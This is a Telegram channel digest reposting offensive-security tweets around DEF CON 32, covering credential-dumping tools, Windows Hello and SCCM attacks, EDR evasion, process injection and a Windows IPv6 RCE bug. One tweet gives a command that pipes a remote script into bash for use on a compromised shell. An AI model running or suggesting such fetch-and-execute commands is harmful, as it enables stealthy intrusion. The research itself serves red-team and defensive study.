Offensive Xwitter – Telegram
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ CCob🏴󠁧󠁢󠁷󠁬󠁳󠁿 @_EthicalChaos_ ]

Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈

🔗 https://github.com/CCob/Shwmae

🐥 [ tweet ]
😈 [ Orange Tsai 🍊 @orange_8361 ]

Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!

Highlights include:
Escaping from DocumentRoot to System Root
Bypassing built-in ACL/Auth with just a '?'
Turning XSS into RCE with legacy code

🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html

🐥 [ tweet ]
😈 [ Ricardo Ruiz @RicardoJoseRF ]

Last week I made public TrickDump, a tool to dump lsass using only NTAPIs without creating a Minidump file, generating instead 3 JSON files and 1 ZIP file with the memory region dumps. Check it out here:

🔗 https://github.com/ricardojoserf/TrickDump

🐥 [ tweet ]
😈 [ OtterHacker @OtterHacker ]

I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!

🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32

🐥 [ tweet ]
😈 [ Bad Sector Labs @badsectorlabs ]

Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with

We've found credentials, certificates, custom apps, keystores, etc. What will you find?

🔗 https://github.com/badsectorlabs/sccm-http-looter

🐥 [ tweet ]
😈 [ klez @KlezVirus ]

[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)

🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p

🐥 [ tweet ]
😈 [ Dirk-jan @_dirkjan ]

At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.

Slides:
🔗 https://dirkjanm.io/talks/

PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion

🐥 [ tweet ]
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

RELEASE:
This should be the 1st command you execute on a remote shell 🧨

source <(curl -SsfL https://thc.org/hs)


Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).

LEAVES NO TRACE (memory only).

🔗 https://github.com/hackerschoice/hackshell

🐥 [ tweet ]
😈 [ Daniel @0x64616e ]

Lol, blocking the loading of EDR drivers with WDAC actually works.

🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]

Another method that still works on most EDRs is the HVCIDisallowedImages reg key, which blocks drivers by filename.
It can take multiple filenames, but requires HVCI to be enabled + a reboot.

🐥 [ tweet ][ quote ]
😈 [ Dazzy @dazzyddos ]

Wrote a blog post on abusing exclusions to evade AVs/EDR, which is stealthy, effective and an often overlooked topic.

🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49

🐥 [ tweet ]
😈 [ Logan Goins @shellph1sh ]

Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)

🔗 https://logan-goins.com/2024-07-23-ldap-relay/

🐥 [ tweet ]
😈 [ wei @XiaoWei___ ]

MSRC fixed an RCE bug in the TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.

🐥 [ tweet ]
😈 [ Synacktiv @Synacktiv ]

In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.

🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial

🐥 [ tweet ]
😈 [ 𝙁 𝙀 𝙇 𝙄 𝙓 𝙈 @felixm_pw ]

How many of you are down the bottom? 💀

🐥 [ tweet ]
😈 [ Tetsuo @7etsuo ]

Added templates for 24 process injection techniques to my Windows API Cheatsheet.

Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning

🔗 https://github.com/7etsuo/windows-api-function-cheatsheets

🐥 [ tweet ]
😈 [ Emeric Nasi @EmericNasi ]

Hi, I talked about advanced initial access in June at OffensiveX in Athens.

Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf

For those who ask: I still don't know when the recorded talk will be published.

🐥 [ tweet ]
😈 [ Will @BushidoToken ]

I am happy to share a new resource I recently created called The Ransomware Tool Matrix:

🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix

🐥 [ tweet ]
😈 [ Robel Campbell @RobelCampbell ]

Regarding CVE-2024-38063 IPV6 RCE in Windows...

After reading RFCs about optional headers in IPv6 packets, I managed to create a POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually writes data out of bounds and causes a crash.

I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.

As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).

🐥 [ tweet ]
😈 [ farmpoet @f4rmpoet ]

It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵

🔗 https://threadreaderapp.com/thread/1825472703223992323.html

🐥 [ tweet ]